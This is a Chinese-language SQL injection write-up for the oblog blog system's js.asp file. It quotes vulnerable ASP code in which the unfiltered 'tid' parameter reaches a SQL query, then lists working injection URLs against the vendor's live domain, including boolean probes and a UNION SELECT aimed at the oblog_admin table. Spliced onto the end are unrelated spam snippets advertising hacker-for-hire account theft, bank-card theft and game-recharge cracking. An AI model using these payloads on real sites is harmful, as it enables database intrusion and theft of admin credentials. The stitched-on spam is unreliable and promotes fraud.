漏洞文件:js.asp
<%
Dim oblog
set oblog=new class_sys
oblog.autoupdate=False
oblog.start
dim js_blogurl,n
js_blogurl=Trim(oblog.CacheConfig(3))
n=CInt(Request(”n”))
if n=0 then n=1
select case CInt(Request(”j”))
case 1
call tongji()
case 2
call topuser()
case 3
call adduser()
case 4
call listclass()
case 5
call showusertype()
case 6
call listbestblog()
case 7
call showlogin()
case 8
call showplace()
case 9
call showphoto()
case 10
call showblogstars()
Case 11
Call show_hotblog()
Case 12
Call show_teams()
Case 13
Call show_posts()
Case 14
Call show_hottag()
case 0
call showlog()
end select
****************省略部分代码******************
Sub show_posts()
Dim teamid,postnum,l,u,t
teamid=Request(”tid”)
postnum=n
l=CInt(Request(”l”))
u=CInt(Request(”u”))
t=CInt(Request(”t”))
Dim rs,sql,sRet,sAddon
Sql=”select Top ” & postnum & ” teamid,postid,topic,addtime,author,userid From oblog_teampost Where idepth=0 and isdel=0 ”
If teamid<>“” And teamid<>“0″ Then
teamid=Replace(teamid,”|”,”,”)
Sql=Sql & ” And teamid In (” & teamid & “) ”
End If
Sql=Sql & ” order by postid Desc”
Set rs=oblog.Execute(Sql)
sRet=”
”
Do While Not rs.Eof
sAddon=”"
* sRet=sRet & “ ” & oblog.Filt_html(Left(rs(2),l)) & “”
If u=1 Then sAddon=rs(4)
if t=1 Then
If sAddon<>“” Then sAddon=sAddon & “,”
sAddon=sAddon & rs(3)
End If
If sAddon<>“” Then sAddon=”(” & sAddon & “)”
sRet=sRet & sAddon & “
”
rs.Movenext
Loop
Set rs = Nothing
sRet=sRet & “
”
Response.write oblog.htm2js (sRet,True)
End Sub
调用show_posts()过程必须要符合上面的参数n=1,j=13
(” & teamid & “)
http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1
http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1) and 1=1 and (1=1 返回正常
http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1) and 1=1 and (1=2 返回异常
猜管理员表名
http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1) and 查询语句 and (1=1
Sql=”select Top ” & postnum & ” teamid,postid,topic,addtime,author,userid From oblog_teampost Where idepth=0 and isdel=0 ”
http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1) and 1=2 union select 1,2,3,4,5,6 from oblog_admin where id=(1
document.write('
新赛季主题—童梦奇兵 跑跑卡丁车手游S5赛季已经接近尾声了,相信各位玩家都很期待S6什么时候开启吧,目前 官方已经确定了S6的赛季主题,这次我们将要进入童话世界,体验全新的地图、新赛车。那么S6什么...
把 以前的QQ软件御掉,然后重 装QQ软件!(为了QQ软件安全!怕QQ某些文件有病 毒!) 找黑客帮忙盗号要多少钱(黑客教你3分钟盗号) ?预 防被盗的措施?: 1....
黑客找聊天记录相关问题 wifi黑客app怎么使用相关问题 黑客是什么职业 怎么修改游戏充值破解(网页游戏充值破解软件)...
这天晚上,山东省成武市芒庙村很平静,但村里一位名叫张富的村民却坐立不安。 天快黑了,但他的妻子万红还没有从母亲家回来。 她丈夫心里有一种不祥的预感。 很快,丈夫的预感就实现了。 晚上7点31分,他的妻...
随着电竞行业的不断发展,越来越多年轻人加入到这个行业中,随之而来的也是出现了各种不同的职业。电竞陪玩师以其低门槛和高收入迅速成为了当下最为热门的职业之一,而低龄化则是这个行业的最大特点。 ...
支付宝被骗转账找黑客相关问题 高级黑客交流群相关问题 黑客怎么盗银行卡 周末化妆班培训学校(美工培训周末班) 黑...